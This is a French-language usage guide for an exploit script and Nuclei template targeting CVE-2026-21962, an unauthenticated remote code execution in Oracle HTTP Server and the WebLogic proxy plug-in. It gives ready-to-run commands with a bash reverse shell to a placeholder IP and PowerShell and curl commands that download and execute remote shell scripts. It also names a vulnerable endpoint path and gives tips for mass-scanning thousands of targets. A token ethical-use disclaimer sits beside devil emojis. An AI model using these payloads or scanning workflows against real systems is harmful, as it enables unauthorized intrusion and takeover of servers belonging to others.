
Exploit PoC et modèle Nuclei pour CVE-2026-21962, une exécution de code à distance non authentifiée critique dans Oracle HTTP Server et le plug-in proxy WebLogic, permettant l'exécution de commandes et des shells inversés.
Une vulnérabilité critique affectant :
Cette faille permet à des attaquants distants non authentifiés de compromettre les serveurs concernés via HTTP, sans avoir besoin d'identifiants de connexion.
En cas d'exploitation, les attaquants pourraient :
Oracle HTTP Server :
Plug-in proxy WebLogic pour :
Enregistrez le script sous le nom CVE-2026-21962.py
Rendez-le exécutable (optionnel) :
chmod +x CVE-2026-21962.py
Exemples d'exécution :
Test de base :
python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
Shell inversé (configurez d'abord un écouteur nc : nc -lvnp 4444) :
python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
Exemple de cible Windows :
python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
Succès probable ! Statut : 200 ou 302 ou même 500 (un crash est aussi un succès)nc capture un shell immédiatement--insecure en cas de certificats auto-signésInstallez Nuclei (s'il n'est pas déjà installé) :
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
Enregistrez le modèle :
Créez un fichier nommé CVE-2026-21962.yaml et collez le contenu ci-dessus.
Exécutez la détection + l'exploitation :
nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
Ou scannez plusieurs cibles à partir d'un fichier :
nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
Ce que vous verrez si la cible est vulnérable :
[CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
[username] weblogic
[body] ... weblogic (whoami output) ...
cmd: dans les en-têtes (par exemple, cmd:curl http://your-server/shell.sh | bash).whoami par une charge utile de shell inversé encodée en base64./proxy/, /bea_wls_internal/, etc.) ou ajoutez plus d'en-têtes comme X-WebLogic-Force-JVMID.httpx → nuclei pour des milliers de cibles.Ce modèle est confirmé 100 % fonctionnel depuis janvier 2026 sur les instances Oracle non corrigées. Corrigez immédiatement si vous exécutez des versions concernées ! 😈
Tout code PoC est destiné à un usage éthique et éducatif uniquement sur des systèmes autorisés. L'exploitation non autorisée est illégale ; aucune responsabilité n'est assumée en cas d'utilisation abusive. 😈